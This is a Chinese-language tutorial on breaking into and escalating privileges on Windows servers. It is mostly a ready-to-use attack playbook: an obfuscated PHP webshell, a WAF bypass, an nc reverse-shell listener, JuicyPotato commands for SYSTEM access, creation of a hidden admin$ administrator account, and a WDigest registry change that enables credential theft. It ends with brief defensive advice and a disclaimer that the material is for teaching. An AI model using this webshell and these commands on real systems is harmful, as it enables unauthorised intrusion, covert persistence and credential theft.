Windows渗透提权技术实战教学文档

0x01 信息收集与初始入侵

1.1 目标发现

• 利用robots.txt文件发现敏感路径
• 使用Censys、Shodan、Zoomeye等工具批量搜索目标
• 绕过WAF技巧：
  • 宝塔WAF：使用file_put_con%00tents绕过
  • 旧版安全狗：使用已知绕过方法

1.2 WebShell植入

PHP WebShell代码示例：

<?php 
function a(){ return "assert"; } 
$a=a(); 
$aa = array($_POST["1"]); 
call_user_func_array($a,$a=$aa); 
?>

0x02 提权技术详解

2.1 初始权限评估

• 执行whoami确认当前用户权限
• 检查网络环境：netstat -nao和net view /domain
• 检查文件系统访问权限

2.2 MySQL提权尝试

• 需要数据库配置文件信息
• 检查net user确认MySQL账户权限

2.3 反弹Shell尝试

• 使用nc监听：nc -vv -l 12388
• PHP反弹连接测试

2.4 系统补丁分析提权

1. 获取系统信息：
   • systeminfo > sysinfo.txt
2. 使用windows-exploit-suggester.py分析缺失补丁
3. 常见可利用漏洞：
   • MS16-032 (Secondary Logon Handle Privesc)
   • 其他MS系列漏洞

2.5 RottenPotato/JuicyPotato提权

1. 检查必要权限：

   • whoami /priv
   • 需要SeImpersonatePrivilege已启用

2. JuicyPotato使用：

JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

3. WebShell版JuicyPotato：

JuicyPotato.exe -p whoami

2.6 权限维持技术

1. 创建隐藏管理员账户：

net user admin$ password
net localgroup administrators admin$ /add

2. 远程桌面连接：

proxychains rdesktop -f 目标IP:端口

3. 凭证抓取准备：

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

4. 登录监控脚本：

@echo off
date /t >>C:\WINDOWS\loginlog.log
time /t >>C:\WINDOWS\loginlog.log
netstat -an | find ":3389" | find "ESTABLISHED" >> C:\WINDOWS\loginlog.log

0x03 工具与资源

1. 漏洞利用工具：

   • Metasploit Framework
   • K8tools中的iislpe
   • windows-exploit-suggester.py

2. 提权工具：

   • RottenPotatoNG (https://github.com/breenmachine/RottenPotatoNG)
   • JuicyPotato (改进版)

3. 凭证抓取：

   • Mimikatz (需系统配置支持)

0x04 防御建议

1. 及时更新系统补丁
2. 限制服务账户权限
3. 监控异常账户创建
4. 禁用不必要的特权
5. 加强WAF规则更新
6. 定期检查系统日志
7. 启用Credential Guard防御凭证窃取

0x05 总结

• 渗透测试中权限提升需要多方面尝试
• 系统信息收集是关键第一步
• 多种提权方法需要结合使用
• 权限维持技术需谨慎使用以避免被发现
• 防御方应从补丁、权限和监控三方面加强防护

注意：本文档仅用于网络安全教学和研究目的，未经授权对他人系统进行渗透测试是违法行为。